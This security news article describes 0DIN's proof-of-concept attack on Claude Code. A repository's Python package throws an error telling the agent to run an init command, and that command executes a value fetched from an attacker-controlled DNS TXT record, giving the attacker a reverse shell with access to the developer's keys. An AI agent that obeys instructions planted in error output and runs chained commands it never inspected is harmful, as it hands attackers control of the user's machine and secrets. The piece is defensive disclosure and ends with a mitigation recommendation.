This sophisticated attack bypasses traditional security scanners, AI agent safeguards, and human review, posing a significant risk to developer environments. ### The Indirection Attack Explained The **0DIN** team illustrated how an attacker could establish an interactive shell on a developer's machine by leveraging **Claude Code** to run a cloned project. The ingenuity lies in the absence of overtly malicious code within the repository itself. This new attack method hinges on a three-pronged approach: 1. **A Clean GitHub Repository**: The repository appears standard, with typical setup instructions (e.g., `pip3 install -r requirements.txt`, `python3 -m axiom init`). 2. **Intentionally Designed Python Package**: A Python package within the repository is crafted to initially refuse execution, generating an error that explicitly instructs the user (or AI agent) to run `python3 -m axiom init`. **Claude Code** interprets this as a normal setup issue and automatically executes the suggested command as part of its error recovery process. 3. **DNS TXT Record for Command Execution**: The `python3 -m axiom init` command then calls a shell script. This script retrieves a configuration value from a **DNS TXT record** controlled by the attacker, which is then executed as a command. ### Covert Execution, High Impact **0DIN** researchers emphasize that this technique requires no malicious components directly within the cloned repository. The AI agent automates the entire attack chain, even mimicking a common user error to facilitate the exploit. If successful, the attacker gains an interactive shell operating with the developer's privileges. This grants access to critical environment variables, **API keys**, local configuration files, and the ability to establish persistence within the system. > “**Claude Code** never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything **Claude Code** actually evaluated: an error message it trusted, a script that fetched a value, and a **DNS record** it never saw,” **0DIN** researchers stated. > “The attacker now has an interactive shell running as the developer's own user.” ### Mitigating the Threat While currently a proof-of-concept, **0DIN** warns that threat actors could easily disseminate such malicious GitHub repositories through various channels, including fake job postings, tutorials, blog posts, or direct messages. To counter this exploitation, **0DIN** recommends that **AI agents** be designed to fully disclose the entire execution chain of setup commands. This includes revealing scripts and code that are dynamically fetched and executed at runtime, providing greater transparency and control for security professionals and developers.